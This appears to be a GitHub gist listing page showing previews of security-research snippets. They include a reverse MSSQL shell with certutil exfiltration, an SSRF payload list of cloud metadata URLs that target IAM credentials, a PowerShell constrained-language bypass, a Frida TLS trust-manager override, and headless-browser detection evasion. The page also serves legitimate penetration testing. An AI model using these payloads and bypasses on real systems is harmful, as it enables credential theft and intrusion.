Skip to content

Instantly share code, notes, and snippets.

View yehgdotnet's full-sized avatar

Aung Khant yehgdotnet

91 followers · 204 following
View GitHub Profile
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 22, 2024 10:31 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@tegansnyder
tegansnyder / Preventing-Puppeteer-Detection.md
Created February 23, 2018 02:41
Preventing Puppeteer Detection

I’m looking for any tips or tricks for making chrome headless mode less detectable. Here is what I’ve done so far:

Set my args as follows:

const run = (async () => {

    const args = [
        '--no-sandbox',
        '--disable-setuid-sandbox',
        '--disable-infobars',
@staaldraad
staaldraad / awk_netstat.sh
Last active April 3, 2024 07:01
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@peewpw
peewpw / Program.cs
Created December 3, 2017 22:38
using System;
using System.Diagnostics;
namespace peewpw
{
static class Program
{
[STAThread]
static void Main()
{
@mattifestation
mattifestation / RunscripthelperBypass.ps1
Created October 29, 2017 15:29
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
function Invoke-RunScriptHelperExpression {
<#
.SYNOPSIS
Executes PowerShell code in full language mode in the context of runscripthelper.exe.
.DESCRIPTION
Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active April 20, 2024 01:36
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@oleavr
oleavr / trust-manager.js
Created June 8, 2017 13:49
How to implement an X509TrustManager using Frida
'use strict';
var TrustManager;
var manager;
Java.perform(function () {
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
TrustManager = Java.registerClass({
name: 'com.example.TrustManager',
@chadmayfield
chadmayfield / hashcat_macos.sh
Created June 2, 2017 17:24
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@justincbagley
justincbagley / How_to_Convert_Markdown_to_PDF.md
Last active April 15, 2024 19:50
How To Convert Markdown to PDF

How to convert markdown to PDF:

This post reviews several methods for converting a Markdown (.md) formatted file to PDF, from UNIX or Linux machines.

Using Pandoc:

$ pandoc How_I_got_svg-resizer_working_on_Mac_OSX.md -s -o test1.pdf